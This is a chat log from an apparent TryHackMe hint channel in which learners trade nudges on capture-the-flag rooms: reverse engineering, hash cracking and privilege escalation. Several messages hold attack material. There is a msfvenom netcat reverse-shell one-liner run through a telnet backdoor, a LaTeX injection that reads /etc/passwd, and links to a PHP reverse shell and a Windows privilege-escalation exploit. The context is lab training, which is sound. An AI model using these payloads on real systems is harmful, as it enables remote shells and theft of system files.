#room-hints

or at least, you don't need to be like, super experienced with ASM

it helps to organize chunks of the assembly code as "functions"

because it's true- one single function/line of code in C++ or Python could translate to anywhere between 2 to 30+ lines of instructions in Assembly

the assembly that you're looking at- it's an optimized version of instructions for the machine to perform whatever the programmer wanted to do

Alright. Thanks for taking the time to share those tips. Really appreciated. Will keep on cracking at it and apply what you suggested

yea

np- and don't be too discouraged by it, RE is hard

nobody ever said it was easy lmao

ezpz

but it's hard in the same sense as writing a paper about a poem or book

it's less about exactly what they're saying, but more about what they're trying to say

I like it even though it's giving me headaches atm. I find it quite interesting to look at. Will most likely learn more about it in the future.

yea

you can try the other rooms, since not all RE exercises are the same

^

try checking out some of the ghidra rooms, or even the basic malware analysis room

After this intro to x86-64 room, you can actually really easily do the basic malware analysis room, albeit you might have to use ghidra

https://tryhackme.com/room/basicmalwarere

I did this one right after the introx86-64 room

Cool. Will check it out. Thanks again!

because it's true- one single function/line of code in C++ or Python could translate to anywhere between 2 to 30+ lines of instructions in Assembly
@white salmon
when I was making an RE challenge 4 lines of python code turned into 1500 lines of C code. I didnt even both opening ghidra to check how bad it was haha

Woah.... lol

yep

but atgain

even after those 1500 lines of C code

they're still only just 4 lines of python code.

You don't need to figure out 1500 lines of C code- you need to figure out 4 lines of python code

lol

well yea but if you disassemble it its gonna look like gobbly gook in assembly

even though its only 4 lines

That's encouraging 😆

I mean

at least you're not trying to reverse engineer an entire operating system 👀

or the su binary 👀

i needed a small hint on the room Easy Peasy......anyone?

?

@tacit owl can i DM?

yaa sure

When writeups in the room itself are released
Within 3 days?

No

@twin shale thats up to the room creator

They're released whenever the creator approves them

You can submit them at any point

Oh thanks! I was curious because if I publish my writeup, the people may be able to find it, and I wouldn't like to spoil

@robust lagoon it just clicked for me

Been stuck for a few hours on the intro to x86-64 room, last task. I found s***et, there seems to be a call that does some kind of ||xor|| but I don't understand it. I set a ||beak point before the cmp call when it checks if the password is correct|| but looking at the rax register after that, I can see it's 0. Not sure where to go next with this. Any suggestions are much appreciated.
@robust lagoon Got further then me, loaded in into ghidra and was lost... (I'll wait the write up to learn how to go about this) excellent room tho apart from my own shortcomings

https://tryhackme.com/room/basicmalwarere
@white salmon Thank you so much, I can start here!

Yeah, the Basic Malware one isn't very hard actually- you'd be surprised.

I consider all of the tasks in Basic Malware RE easier than the Intro to x86-64

Honestly its a new kettle of fish from .net re lol, much more low level, I'll learn it at some point

Soon as I know how to use Ghidra and roughly what i ought to be doing i should be more confidant. Time I guess..

Do you happen to know if any PHP rooms exist? as in editing or having to make PHP payloads to bypass

hmm

That kind of depends on what you mean by PHP payloads since PHP is used for a lot of things

sorry I mean more, like you have to make or edit a php script rather then just send up a revshell

I guess more analysis, learning based on actual PHP code

yeah

There's not a lot that I can think of, since PHP injections like that requires a specific set of conditions (the target has to allow you to upload .php/.html, the target automatically has it accessible via the webserver/site as soon as you upload it)

the Blog room has one iirc

Right ok thank you. Not an issue

if you haven't done it already

dave's blog? Ok I think i only started but stopped it

No, the other one

uh

https://tryhackme.com/room/blog

ah yes done that one

yeah, most PHP injections have been kinda automated away by Metasploit

since they're very specific conditions but usually the only goal is to get a revshell

blog can be done manually

its just a royal PITA

generally if you're allowed to inject php code and run it in some way, you pretty much are always allowed to go straight to revshell

Ah ok, I need to learn more of it. yes I need to make a rev shell has to have upload and download ability. I will go study a source i think next or a few.

which is the ideal result of a PHP injection

I mean, I think you might want to look into creating payloads possible, like reverse shell scripts/programs

I don't know php but have the basics of rev shells in other languages, never got on with php

ah

you can always look up php_reverse_shell on kali

lol

oh? ok 🙂

https://github.com/pentestmonkey/php-reverse-shell/blob/master/php-reverse-shell.php#L1

they all pretty much work exactly the same

Awesome, that looks nothing like the sources for php i was looking at, seems more like powershell or python. sound

Yeah

you have to remember that most of PHP injections is just tricking the webserver into running system commands

What does this means

No hints

New room

Jeff foothold nudge? ||I have access to the wordpress site, but I can't edit the php and haven't found a php format that can be uploaded and the SQLi exploit I found i cant get to work, out of ideas||

Please do not post spoilers

Especially in the hints channel @sly hare

Sure!

Thank you @white salmon Completed the RE room and actually have an idea what to do now in recovery. I can try again 🙂 appreciated.

Epic!

Told you it wasn't hard

LOL

hello,could anyone please help me with Jeff room?

Hot

But it also probably means

Hash it..

hot? like Rose in Titanic?

No

But hash it

so I have to hash it

Have you done that room yet jabba?

thanks. I will try

Don’t expose me 👀

I’m just performing an educated guess

I was actually asking cuz I want a nudge haha

but what kind of hash? md5?

I’d say look around for hints

I’ll do the room tomorrow and get back to you

ok Jabba

thanks

🤦‍♂️

it is MD5

just checked it

thanks for your help Jabba

Awesome Sauce

I deleted the spoiler now you're sorted

Now it just looks like I’m calling rooms hot smh

😆

james youre still here but youre not giving hintsssssssssssssssssss

james youre still here but youre not giving hintsssssssssssssssssss
@oblique cliff ?

Jeff foothold nudge? ||I have access to the wordpress site, but I can't edit the php and haven't found a php format that can be uploaded and the SQLi exploit I found i cant get to work, out of ideas||

I can't help you lol

I have the user flag but I shouldn't

Haven't deployed the machine yet

😱

Why’d I have to click the spoiler text ughhh I’m going off peace

dang nabbit

lmao

dummy

Can someone give me a hint on the easy peasy box? I found the hidden directory but cant decode the gost hash.

hey all, I'm having trouble with easy peasy too

!rule 13

Rule 13: When asking for help/tech support please perform research to your fullest ability. Mods and Community Mentors have the right to refuse helping those who have not done troubleshooting/research on their own first. Clearly phrase your questions as we (fortunately for all parties involved) cannot read your mind. Please include the room, task, and question number in your question if possible.

Although we are a a learning platform, we politely ask that you respect the competitive nature of newly released challenges. As such, no hints for new challenge boxes should be given immediately after a release, unless specifically allowed by the content creator.

Nope, not for a few days

hello, i have a question in the anthem room. Task 1 question 7. I am stuck there. I just need a hint because i dont have any clue to how i could get the name of the administrator. Thanlks

thanks

The question is : Whats the name of the administrator

Can’t

It’s a new room

!rule 13

Rule 13: When asking for help/tech support please perform research to your fullest ability. Mods and Community Mentors have the right to refuse helping those who have not done troubleshooting/research on their own first. Clearly phrase your questions as we (fortunately for all parties involved) cannot read your mind. Please include the room, task, and question number in your question if possible.

Although we are a a learning platform, we politely ask that you respect the competitive nature of newly released challenges. As such, no hints for new challenge boxes should be given immediately after a release, unless specifically allowed by the content creator.

@cyan willow and remove this please as it’s a spoiler

anthem isnt a new room?

and you posted the spoiler as is 🤦‍♂️

They deleted it

Sorted

I didn’t @ Marco I @‘d the other dooooood

oh i didnt realize all of that was the same thread

my b

Yeee

@terse kiln did you look at the hint?

yeah

its pretty clear how youre supposed to get that question 🙂

so did you try to research based off what the hint says?

no i didnt understand what the hint meant

on the website theres a quote from the administrator, did you see that?

yes

did you try researching who said that quote?

no

i will

now

thats what the hint is trying to tell you to do

ok, thanks

I see who it is, thanks

np

Help. I'm in Burp suite and I'm stuck on task 10 (#6 and #7). Can anyone help me with the whole estimated entropy thing please?

@silk prairie Just ask your question and somebody will help you :)

Hello, it is me again.
I am working on the room Jack of all trades. I have gained access into the machine and im looking around and I can't seem to find a way to get the Root Flag. I looked at the hint provided and not sure how it helps. Anyone else able to supply a hint? ||I have already looked at the find permissions and nothing stands out to me. Checked this for all users as well.||

You need to escalate your privileges to root. That’s what the hint is telling you

Alright thank you. Ill keep looking around the machine

Wait why did you say that about || the find command||?

Do you || have Sudo rights with it||?

It’s been awhile since I did that box

@ashen matrix

@oblique cliff ||the user has no sudo rights when i checked via sudo -l||

what I was meaning was I did a search with -perm /4000

That command looks for files with the SUID bit set

Alright. I am searching wrong. I will expand it. thank you

No hold on

Which user are you currently

||jack||

And you didn’t see anything when looking at either your Sudo rights or finding SUID binaries?

You sure?

||Sudo says "Sorry, user jack may not run sudo on jack-of-all-trades. "||

Use the script suid3num.py to look for SUID binaries

It’s hard to do that manually if you don’t know what comes default on a machine

Go get that script and lmk if you see anything interesting after running that

1 thing looked odd and i ran scripts on it but its gibberish to me lol

||exim4|| That odd?

No. Go get the script from GitHub

Got it. Ill check that out and let you know

@oblique cliff ran the file and ||it is marked that strings is an exploitation, I run strings on the root flag and its resolved|| Thank you for the help. Keeping that python for future machines

ezpz flag 2? I got all the flags including root but I am failing to find the 2nd flag lol

You've seen it before but you didn't now that you have

Hello everyone...

Anyone tried easy peasy on tryhackme?

thanks. I forgot that part completely lol

hi y'all, im working on cc pentesting, currently on task 13, question 6. cracking hashes with hashcat. i got the md5 one in a few secs. yesterday i tried the md4 one with "hashcat -m 900 -a 3 <hash>" it ran for a couple hours without result and the next iteration would take 4 days... i think im missing something here and would appreciate a push in the right direction. 🙂

try without -a 3

it should be cracked in less than 2 min

without -a 3 (so it defaults to -a 0) its giving me "read timeout in stdin mode" is that normal then?

send a screenshot

ok wait a min

np, thanks for looking into it.

save the hash in a file and try this hashcat -m 900 <file-path> <wordlist-path>

I need advice on why my exploit for Dave's blog works locally but not remotely.

Anyone open for a dm

@arctic crystal i ran it against rockyou, is this the expected output?

you haven't used rockyou before ?
unzip the file first

it should be rockyou.txt and not rockyou.txt.gz

i have once, but dont recall having to unzip it :x

thx, that worked now

tries 100 things but forgets to unzip

LOL

Any hint for easy peasy room for hidden directory...i've found 3 flags but couldn't find hidden directory.....wordlist hint would be appreciated....

@white salmon we cannot give you help as the room was released yesterday

!rule 13

Rule 13: When asking for help/tech support please perform research to your fullest ability. Mods and Community Mentors have the right to refuse helping those who have not done troubleshooting/research on their own first. Clearly phrase your questions as we (fortunately for all parties involved) cannot read your mind. Please include the room, task, and question number in your question if possible.

Although we are a a learning platform, we politely ask that you respect the competitive nature of newly released challenges. As such, no hints for new challenge boxes should be given immediately after a release, unless specifically allowed by the content creator.

@trim haven okk

Room: blog or billy's blog.

Enumerated but all i got is lousy usernames.
I dont wanna bruteforce. Compiled about 20 passwords, no dice.

Any hint or direction?

need hint for decrypt file in htdocs on room recovery

Room: Advent of Cyber
task: 18
found the hidden directory but I'm stuck after it, any hint?

hey i'm on room LaxCTF need hint for the foothold part this is all i found || a potential username john the latex to pdf convertor seems vulnerable i tried the following code \newread\file
\openin\file=/etc/passwd
\loop\unless\ifeof\file
\read\file to\fileline
\text{\fileline}
\repeat
\closein\file ||

but i'm not able to see anyhting in the output i'm not familiar with this latex code if someone can tell what's wrong with the code or what else can i try

@sick sun same place as the other tasks

Room: blog or billy's blog.

Enumerated but all i got is lousy usernames.
I dont wanna bruteforce. Compiled about 20 passwords, no dice.

Any hint or direction?
@velvet crescent there are 3 usernames.. use wpscan to get the password.. if it is taking more than 10mins something is not right

Room: Advent of Cyber
task: 18
found the hidden directory but I'm stuck after it, any hint?
@arctic crystal read..comments and blog post

there are 3 usernames.. use wpscan to get the password.. if it is taking more than 10mins something is not right
@indigo ridge *two usernames

@arctic crystal read..comments and blog post
@indigo ridge
I got the password and username and also got the user flag

But unable to get the root flag

I checked write ups but whatever is given in writeups is not working on my machine

@white salmon yeah, that was indeed the question. I put everything... room=burp suite, task 10, question #6 and #7. The question is on "how to measure the effective estimated entropy" in sequencer. Any hints?

`
Parse through the results. What is the effective estimated entropy measured in?

`

You're misunderstanding what the question asks

@stuck fractal thanks. No, it was just another way of putting the question, but I have to admit to it's misleading. When I put the bits I see in the results, it doesn't accept it

You've rephrased it in an incorrect way

What is the effective estimated entropy measured in?

Eg what is temperature measured in?

The question isn't how to measure it

It's what unit

Yeah thanks, that's what I meant. Now, I exactly stop around 10000 as it says, but still the number i get is not correct

I don't know what I'm doing wrong

I checked write ups but whatever is given in writeups is not working on my machine
@arctic crystal any help for this one

The VM was changed from Retro to Blaster if it's Day 13

It's a heck of a lot easier now that change has been made

And it makes the exploitation for privesc incredibly easy

ok so am I in wrong machine or I'm doing wrong things?

I don't know what you're doing so I can't answer that

I have got the user flag in day 13 of advent of cyber but I'm unable to get root priv.

That doesn't tell me anything more than you've already said

I checked writeups and whatever is given in writeups is not working in that machine

Please explain

It's the same exploit for privesc between blaster and retro, so if it's not working then you're not performing it correctly

this is what I got from writeup ||https://github.com/jas502n/CVE-2019-1388/blob/master/CVE-2019-1388.gif||

That will work if you do it correctly

Find a youtube video on it

there's no chrome installed in the machine though

Doesn't matter

There doesn't need to be

Find a youtube video on it
@stuck fractal

and it is just not working on explorer

ok fine

Then you're doing it wrong

also explorer != internet explorer

@stuck fractal I'm doing what the question says. #1 send a request with "set-cookie" to sequencer. #2 start live capture. #3 pause around 10,000 requests. #4 analyze and try to get the effective en estimated entropy... what am I doing wrong? Or should I dm you?

@silk prairie I can't help you, or I would have.

@stuck fractal can you at least tell me at what point I am getting it wrong?

No

Because I can't help you at all

Because I don't use burp

@silk prairie what happened

I would have helped you if I could

I can halp

What’s the issue you’re having

@oblique cliff thanks. I'm trying to solve a question where they are asking about "effective estimated entropy" measured in. Burp room, task 10, question #6 (sequencer)

It's exactly where they say it is

He’s not wrong ^

@silk prairie As I've said, it's asking for the units

Also if you read the next task carefully, it also tells you the answer

with an s remember that

It's asking for the unit of measure like everybody mentioned

Find a youtube video on it
@stuck fractal It worked. Thanks

can someone give me nudge on the haskell root am prof already

i know ||/usr/bin/flask||

@ripe hedge in ||/usr/local/apache2/|| ??

@sinful plaza did you try running it and seeing what happens

@sick sun you fixed the rest right? The hint for the server is in the same place as the rest

@sinful plaza did you try running it and seeing what happens
@oblique cliff yes i try running the flask

And what happens

i try running it with ||python /usr/bin/flask|| nothing happened

There’s no output whatsoever?

file /usr/bin/flask

If it's not a python file, don't run it with python

If it's not a python file, don't run it with python
@stuck fractal kkk noted

We were gonna get there 🤨 @stuck fractal

There’s no output whatsoever?
@oblique cliff yes i get some output

Care to say what it is?

sure

/usr/bin/flask: Python script, ASCII text executable

Can you screenshot instead of copy paste please?

sure

@ripe hedge can i PM you ?

@oblique cliff

Run it without file

James lied to you for our purposes

how did he lie lol

@sick sun I can't guarantee an answer

Run it without file
@oblique cliff i do run it with file

what

without @sinful plaza

@ripe hedge ok no problem bro

You can DM, but I'm at work so might not answer right away

James lied to you for our purposes
@oblique cliff I mean, I didn't know what was going on. But /usr/bin is typically binaries

I know 🙂

It’s ok I forgive

Hey,
Room: zthlinux
Task: 21
Initially I searched for an environment variable called test1234 - it didn't exist - so I created it, setting it to be equal to $USER
then I tried to execute the shiba2 executable which exists in the shiba2's home directory - and it gave me seg fault
I thought maybe it contains some indicative strings in it - but didn't find something interesting

Idea?

without @sinful plaza
@oblique cliff ok a min

Seg fault means you didn't create that variable

At least not properly

@vivid mesa You didn't actually save the variable

Read back

Back to the $ task

k sec

Oh haha you missed an important bit

If stuff doesn't work, your first step should be read back through the material

Oh yeaa

thanks

@oblique cliff ok a min
@sinful plaza ||flask [OPTIONS] COMMAND [ARGS]...

This shell command acts as general utility script for Flask applications.

It loads the application configured (through the FLASK_APP environment
variable) and then provides commands either provided by the application or
Flask itself.

The most useful commands are the "run" and "shell" command.

Example usage:

$ export FLASK_APP=hello.py
$ export FLASK_DEBUG=1
$ flask run

Options:
--version Show the flask version
--help Show this message and exit.

Commands:
run Runs a development server.
shell Runs a shell in the app context.||

You see anything interesting in the example usage?

Or how to use it

yes ||shell||

🤷🏿‍♂️

Try it out

sure

im doing Recovery. Got flag 0 and flag 1. whats the preferred approach for the remaining flags

i've never reversed an ELF file

before

🙂

@odd thistle the preferred approach is to most likely do some RE rooms first like intro to x86-64, Malware analysis, or reverse elf

@sinful plaza does your upvote mean you’ve rooted it?

will do thanks

Room HackBack 2019: [Task 12] [Forensics] [Easy] Sniff Sniff : #9: Is it required to decrypt the TLS stream?

Probably not

Unless you have keys, you can't really

ok then i have no idea about this task

It's a broken question

so yeah

Room: Easy peasy, Yea ik the room is new however I tried to ||decode the hash|| with several sites and tools yet it did not work. Any good website for it??

You can't decode a hash

And you're told what site to use

I mean for the ||hidden comment/base whatever|| in the html for the ||hidden directory ||

Not the flags

Yes, I mean that too

try using same site for all hash cracking

I'll look into that then, Cheers

Hey i need a hunt on the room Easy Peasy anyone?

*hint

@cedar tiger

#room-hints is here for people who want a "pointer" towards the room they are completing, and not necessarily a spoiler. As such, when asking a question, be sure to include:

• What room you are on
• At what stage are you stuck exactly? Enumerating? Exploiting? Priv esc?
• What techniques / tools have you tried so far? Just so that we know how to hint you in the right direction without repeating what you've already done

@stuck fractal can i DM because there can be a spoiler

You cannot.

||use spoiler tags||

Try harder is the default hint

Ok so Room- easy peasy
Stuck at- Flag 2
I have the flag 1,3 but can't seem to enumerate anything more on the ports serving http..... I have used every word list and every extension
I have also tried decoding the || hidden text in highest port ||

Also i have || used the given user agent in fuzzing|| so please tell if i am doing something wrong... Or just trying at the wrong place

You've seen flag2

You don't know you have

But you've seen it

I was stuck on that as well, you probably have already everything to find it

Oh! Well thanks :)

It's a broken question
@stuck fractal this means?

@white salmon Not solvable through legitimate methods?

ah ok.

thx

Anyone got a hint for flag15 of the Linux Challenges, I've tried everything I could find on Google

What’s the question

Can you find information about the system, such as the kernel version etc.

There's a hint on the question

Yh

Well, I'll keep trying for a bit

But have been stuck here for some time now

Have tried uname, cat /proc/version, have looked in dmesg but can't find it

The hint tells you where to look

I finally got it

thx

Please don't post spoilers like that

oh sry

my bad

morning haze got to me

can i ask you something in PM?

No

Okay

In easy peasy room, which wordlist i have to use?

I'm using ||big.txt and directory-list-2.3-medium.txt and seclists||

should be fine with those ones

Ok

Thank you for the support

In the room you have to crack hashes?

yup

it says in the hint

!13

I didn't read it :)

!rule 13

Rule 13: When asking for help/tech support please perform research to your fullest ability. Mods and Community Mentors have the right to refuse helping those who have not done troubleshooting/research on their own first. Clearly phrase your questions as we (fortunately for all parties involved) cannot read your mind. Please include the room, task, and question number in your question if possible.

Although we are a a learning platform, we politely ask that you respect the competitive nature of newly released challenges. As such, no hints for new challenge boxes should be given immediately after a release, unless specifically allowed by the content creator.

@white salmon that belongs to #bot-commands

Some folks are talking about easy peasy machine...that's why

I am stuck in the task "[Task 43] Bonus Challange - The True Ending" of room "zthlinux". I require access to the directory "/root" to read the file "root.txt".
I have access to 5 users (shiba1-4 and noot), neither of them has sudo permissions and can't read from "/root", as this is not a "typical box" but a linux introduction box I assumed that there is no "vulnerability" I need to exploit but probably some file that I must read. Can't seem to advance.

Some folks are talking about easy peasy machine...that's why
@white salmon there are writeups out already

so that box can be discussed

• they haven't asked anything that would spoil the box

Ok

Ok

I am stuck in the task "[Task 43] Bonus Challange - The True Ending" of room "zthlinux". I require access to the directory "/root" to read the file "root.txt".
I have access to 5 users (shiba1-4 and noot), neither of them has sudo permissions and can't read from "/root", as this is not a "typical box" but a linux introduction box I assumed that there is no "vulnerability" I need to exploit but probably some file that I must read. Can't seem to advance.
@white salmon you need to gain access to root acount 🙂

one of the shiba users can lead you to this

oh ok, I was trying to get access to nootnoot as it had sudo permissions. thanks

yeah, you are going in the right direction

con you help password deleted

https://pastebin.com/LTB4ET

room musical stego 5

In the room easy peasy i have a md5 hash, i tried to crack it with differents wordlists and websites and nothing

Any hint?

Hi, for room recovery i have done all the flags but cannot find flag2? am i missing something?

We cannot give hints as easy peasy was released yesterday

Please refer to rule 13 for more information

Yes i see it

:-(

I believe that you can do it, keep trying!!

I'm trying harder

xd

Hi, for room recovery i have done all the flags but cannot find flag2? am i missing something?
@atomic shuttle hey, if you look at fixutil and subsequently the other malicious file you'll see that it does few things
you probably missed one of them and didn't revert it back

Spoilers -_-

Jk I understand the risk of being here

Room zthlinux, Task 43, I have to reach to file named root.txt in root directory
I tried using find / -name "root.txt"
But I'm probably not at the right direction

Can someone maybe give me an hint?

In the room easy peasy i have a md5 hash, i tried to crack it with differents wordlists and websites and nothing
@white salmon It can be cracked with a particular website

@vivid mesa I am stuck in that challange too kek

you can't read it because the user you are logged in

doesn't have access to the root directory

@white salmon i found it, is the best for that xd

@white salmon So what are we supposed to do then?

Idk why i didn't test it beforce ask her

we are supposed to find a way to escalate privileges

@white salmon i found it, is the best for that xd
@white salmon thats because the flag is not a common password it has probably been added to that website

I knew few ways of escalating privileges throught shell, one of them is with faulty programs like nmap older versions and suid binaries, but I can't make neither of those work in this challange

@white salmon They say in this task that we should use our knowledge from the previous tasks only to accomplish that one, so I don't think it's the direction

well if it was only with that knowledge of previous tasks, then the solution would be to find

some file

that contains the password

but if thats the solution I have no way of knowing what file it is

So do they lie to us? 😫

who knows XD

😆

tbh at the moment my only guess is the file shiba3

its different from the others

as in the owner is not shiba or root but "460"

or maybe im totally wrong lmfao who knows

@white salmon what command you used to list those permissions?

ls -la

the a is not necessary

interesting.... ... ..

Hi Guys, I am new to security field so starting from basics.
I was doing Introresearch question where I am uanble to find out the exact answer of below question.

If a password hash starts with $6$, what format is it (Unix variant) ?? As per me it is SHA512Crypt

@white salmon UID

yh, you mean the 460 is a UID?

I checked and it means that the user id wasn't recognized in the /etc/passwd file, most likely deleted or something

@fierce kayak try things. You know the length, and the name

How much time i have to wait for explotate a cronjob?

Well that massively depends on how the cron job is set up

someone should do a room with an PE with a cron job wich runs only once a year 😆

jajaja

cron job which runs every 12hrs or more

Thanks for the hints, i solved Easy Peasy. A good room for beginners

@white salmon Succeeded?

yes

hint?

the solution was a lot easier than all the bullshit I was trying

Haha

^

this is the tip

one of the shiba accounts has a file that we didnt check before

k, let's do some find for a "pass" file

dont search for a name in particular

can't belive I spent 3 hours in this -_-

ohh now I'm curious

Is this about the Learn Linux room?

yeah

Don't look for files with specific names.

You will be there for hours.

How was we supposed to understand the following things:

1. That only ****** user holds the required credentials?
2. That it's located specifically in //********?

it's a mystery

By searching the entire system

For out of place files

For each user

@stuck fractal What do you mean by out of place files?

Normally, stuff belonging to a user will be in places like their home directory

Stuff that's in weird places draws attention

In the Subscriber Room for Burpsuite on Task 6 #4 dont know how to get to the "Web Application hosted on the VM''

Go to the IP of the deployed machine in your browser

Room: Network Services Task:7 ( Exploiting Telnet) Task 7 #11 What is the contents of flag.txt? So here is where I am I have ran the msfvenom and got root@kali:~# msfvenom -p cmd/unix/reverse_netcat lhost=10.10.203.56 lport=4444 R [-] No platform was selected, choosing Msf::Module::Platform::Unix from the payload [-] No arch selected, selecting arch: cmd from the payload No encoder or badchars specified, outputting raw payload Payload size: 98 bytes mkfifo /tmp/lrxfkc; nc 10.10.203.56 4444 0</tmp/lrxfkc | /bin/sh >/tmp/lrxfkc 2>&1; rm /tmp/lrxfkc the IP is that of the deployed machine so then I go to telnet and run mkfifo /tmp/lrxfkc; nc 10.10.203.56 4444 0</tmp/lrxfkc | /bin/sh >/tmp/lrxfkc 2>&1; rm /tmp/lrxfkc correct?

Nearly

There's something you need to do to get the telnet backdoor to run that command, but yes

are you just refering to getting into telnet?

no

you need to prepend something to run the command

.RUN correct?

yee

(I'm assuming you're attacking from a THM kali right?)

I an running this on the deployed machine.

I have the netcat running on my local machine

Do you understand what the LHOST means?

if 10.10.203.56 is the IP address of the Network services room, then your command is wrong

l host is the local host

LHOST here is the machine the shell is going to try to reach back to

It's the same for metasploit

The IP address needs to be your attacking machine's IP

right so then I sould make the IP after the nc my local machine which I have a screen listening on port 4444

.RUN mkfifo /tmp/lrxfkc; nc 10.10.244.102 4444 0</tmp/lrxfkc | /bin/sh >/tmp/lrxfkc 2>&1; rm /tmp/lrxfk

I sould make the IP after the nc my local machine which I have a screen listening on port 4444 I don't know what you mean

The IP address needs to be the IP of your attacking machine

the tun0 (VPN) address* (if using a VM)

that IP 10.10.244.102 is the machine I am running the attack from

As I've asked, are you attacking from a tryhackme kali instance?

yes

Need Help In The Root For the Room Bounty Hacker

sorry

Ok, that's fine then

Try it

?Invalid command```

You're not connected to the telnet session

Need Help In The Root For the Room Bounty Hacker
@mystic walrus
Explain your problem

telnet 10.10.203.56 (room VM) 8012

from attacking VM

Yeah, but you're not in a telnet shell on the machine. Please provide some screenshots as it's much more helpful for us. @blazing ruin

@arctic crystal I Have Done Sudo -l
Then I Get (root) /bin/tar
Then I Don’t Get Any Exploit For That..Can You Lead Me To The Correct Path

https://gtfobins.github.io/ @mystic walrus

Burpsuite Room https://tryhackme.com/room/rpburpsuite
[Task 7] Target Definition
Question 6
What is the term for browsing the application as a normal user prior to examining it further?

I can't seem to find the answer to this even with the hint, anyone got a clue for the answer?

@stuck fractal Thanks Man!❤️

@soft badger It's in the text I believe

read the paragraph closer

Yeah, re-read the task text

Yes I looked through the intro where it said to look but nothing seemed to help, I'll re-read

The whole task text

Between the questions and the task title

Not sure what you mean, sorry

So, a task is broken down into 3 main parts

The title, in the bar

The task text, between that title bar and the questions

And then the questions

You want that middle bit, between the title and the start of the questions

The task text

Hey man , help with Recovery Yet ?

i see

Just flags 2 and 5

Room: linuxctf, flag4, I think I found the required files but i'm not permitted to open them, nor change their permissions

hints?

You're looking in the wrong place then @vivid mesa

@stuck fractal help ?

@shut pollen no.

Please don't just tag me when you want help

:(

I, like everyone else here, am a volunteer

I have not completed the room, I can't help you even if I wanted to.

Nobody else seemed to be up.

Cool Man

Have you considered... being patient?

or potentially accepting the fact that not too many people have solved it, so you're unlikely to get a hint?

suppose I'm in directory x, i want to search for a word y in all the files which are contained in this directory, and in sub-directories inside this directory
is there a way to do that?

the find command

There's a whole room dedicated to it

I really recommend learning how to use it

man find

find will save your hide 100 times over

yeah..

didn't help

some hint for flag 4?

google where cron jobs are created

@oblique cliff /var/spool/cron

no permission to read the files there

oh you must be kidding

im not kidding

i dont kid

yeah i've done that

thanks

you got it?

yeah. thank you!

🔥

grep -rnw '.' -e 'c9*'
why this command doesn't help me with finding flag 6?
the current directory is home

flag 6

Anyone else who has attempted "Bounty hacker " can give a hint as to pw file to use?

@dull palm Enumerate harder

There's a few ports open, keep looking and you'll find it

@vivid mesa You're told the name of the file, it's grep through a file not for a file

Yes sir, I need to buy you a coffee or a shot 😉

why not both

@stuck fractal But this command ( grep -rnw '.' -e 'c9*') is supposed to search in all the files the strings starting with c9

I just told you what you were doing wrong

You are told what file to use!

Don't overcomplicate things

k

room/smaggroto
Found some credentials on an subdirectory, any hint for the further step?

You gotta analyse the pcap a bit more

There's some crucial information

Aight!

Would buy James both, and something to eat, invite him to HLSR if he wanted to come. This person goes above and beyond . And I appreciate the help.

it just a que though i was surfing THM and seen the roon Broklynn 99 well from most of whom that has solved only one had 110 point while other had 60 than too every one among them have given both the ans why so. just the doubt if possible ans!

The first person to answer the question gets bonus points

That's known as first blood, or blood points

@dull palm Houston?

oh i get it thx!

OMW, US isn't letting brits in yet but we'll see

Yes sir, get my nick name? Teck.Cyx, say it fast Texas

Tech.6

Oh wow

I didn’t get that

Now I do

Good one

Thank you.

flag 10 in room linuxctf
Find all other users on the system. What is flag 10.

It's not well-defined

what are exactly the other users?

10, 11, 12, and son on?...

It's defined enough

The room is a challenge.

because 21 and 13 for exmaple

You cannot expect to be walked through a challenge

You are also just stating numbers

The users on that box are not numbers

They are names.

yeah yeha

sorry

k cool

that's enough for today

Room timed out with An hour remaining. Tried to add time at 55mins didn't allow.

refresh the page?

I had that happen to me

Which room @dull palm

it probably didn't actually time out the room

Did but it was dead. Hydra and gobust was telling me cant find host. @oblique cliff "bounty hacker"

probably died then

sorry 😦

Is that windows or Linux

Linux

The flags are usually checkpoints though, so in general you don't have to restart absolutely everything

I just reset the room

Weird. Post it in #site-bugs. Say the room name and tag bloke

Will do, thank you.

There are files that are out of place

Normally, a user's files go in their home directory

So maybe if you look through files belonging to each user, you'll find something that's out of place

I mean I gave you a little more direction

I recommend using find

And supressing error messages

Guessing that I should work harder at my enumeration. Thank you James for the help.

Yes null if you are trying to find user shiba4 and are killing any errors.

Welcome 💯

which ftp server am I supposed to connect to in linuxctf task 5 exc 4 ?

localhost doesn't seem to work

It should have an FTP server running

localhost from your attacking machine refers to your attacking machine

well yah, I am ssh'ed into the "alice" account of the machine

and from there trying to ftp into localhost

nevermind used another ftp client and it worked

I've ran into an interesting problem doing the "Common Linux Privesc" Task 4 creating a payload. When I try to do the payload on my kali virtual box I keep getting Inverse host lookup but when I do the payload on the tryhackme in browser machine it works?

Also the autoscript.sh doesn't seem to run on its own like its supposed to every 5 min. I have to manually run it

@tiny badge In my case... I used my local kali.. And netcat automatically started the reverse shell after 3 mins..

yeah, thats why i don't understand is going on. I keep getting this inverse host lookup failed: Unknown host

but like i said earlier for some reason it works on the tryhackme in browser machine. I get connected

Which version of Linux are u using?

2020.2?

2019.4

I m not at all sure if it will work or not.. try to do a full upgrade .. see if it helps..

Room: Network Swrvices

task 4 Q 4... whats the username and where to find it?

Need help!

Guys can anybody give me some nudge/hints for inoculation, or how to exploit/enumerate webhooks
Thanks for the help

Can you find information about the system, such as the kernel version etc. Find flag 15.
I've run the command uname -a
getting all the information about the linux version etc..
but can't see how to continue from here...
bob@ip-10-10-36-34:/$ uname -a Linux ip-10-10-36-34 4.4.0-1075-aws #85-Ubuntu SMP Thu Jan 17 17:15:12 UTC 2019 x86_64 x86_64 x86_64 GNU/Linux
their hint is *release - our release here is 4 to my understanding
doesn't help...

nvm

in the daily bugle room how long is it going to take to crack the hash??

nvm done

@red mesa did you enumerate?

@vivid mesa think about what *release means in a Linux context

release version

Not quite

Think about what the * is for

oh regexes, thanks

Not quite

But it's a wildcard character

someone can help with flags 26, 27?

i tried to find a file containing the starting word in flag26:
grep -rnw '.' -e '4bceb' 2>/dev/null

but it doesn't help

Both of those you should use the find command

And 26 pipe it into the grep command

k

flag 27 - some hint?

I've managed to find the file

but only the root has the permissions to read and execute it

I'm logged into alice, when running the command sudo -l:
`sudo -l
Matching Defaults entries for alice on ip-10-10-36-34.eu-west-1.compute.internal:
env_reset, mail_badpass, secure_path=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:/snap/bin

User alice may run the following commands on ip-10-10-36-34.eu-west-1.compute.internal:
(ALL) NOPASSWD: /bin/cat /home/flag27`

Doesn't say much

I inspect also the file in /bin/cat - nothing...

Actually that command tells you exactly everything you need to know

Notice what the results of sudo -l tells you and see if you can figure out what it means

The file tells you what you're allowed to do

